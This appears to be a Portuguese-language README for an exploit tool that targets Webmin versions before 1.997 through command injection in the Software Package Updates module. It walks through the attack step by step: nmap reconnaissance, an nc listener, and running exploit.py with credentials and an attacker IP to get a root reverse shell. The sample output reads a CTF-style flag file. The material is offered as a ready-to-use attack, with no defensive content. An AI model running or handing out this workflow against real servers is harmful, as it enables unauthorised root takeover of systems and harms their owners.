
Exploração de execução remota de código autenticada para Webmin < 1.997 via módulo Software Package Updates. Injeta comandos arbitrários como root através de um parâmetro não sanitizado, entregando um shell reverso.
Exploit para a vulnerabilidade de Remote Code Execution no Webmin versões anteriores a 1.997, através do módulo Software Package Updates.
O módulo Software Package Updates do Webmin não sanitiza corretamente o
parâmetro u antes de passá-lo ao sistema. Um usuário autenticado com acesso
a esse módulo pode injetar comandos arbitrários que são executados como root.
Instale as dependências antes de executar o exploit:
pip3 install requests beautifulsoup4 lxml urllib3
| Parâmetro | Descrição | Exemplo |
|---|---|---|
-t | URL do alvo (sem porta) | https://192.168.1.10 |
-u | Usuário do Webmin | admin |
-p | Senha do Webmin | password123 |
-l | Seu IP (onde você recebe a shell) | 192.168.1.5 |
-lp | Porta onde você escuta | 4444 |
1 — Identifique o IP do alvo com Nmap:
nmap -sV TARGET_IP
# Procura a porta 10000 com Webmin
2 — Abra o listener em sua máquina:
nc -lvnp 4444
3 — Em outro terminal, execute o exploit:
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l TU_IP \
-lp 4444
4 — Se o exploit for bem-sucedido, você verá:
5 — No listener você receberá uma shell como root:
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# Terminal 1
nc -lvnp 4444
# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444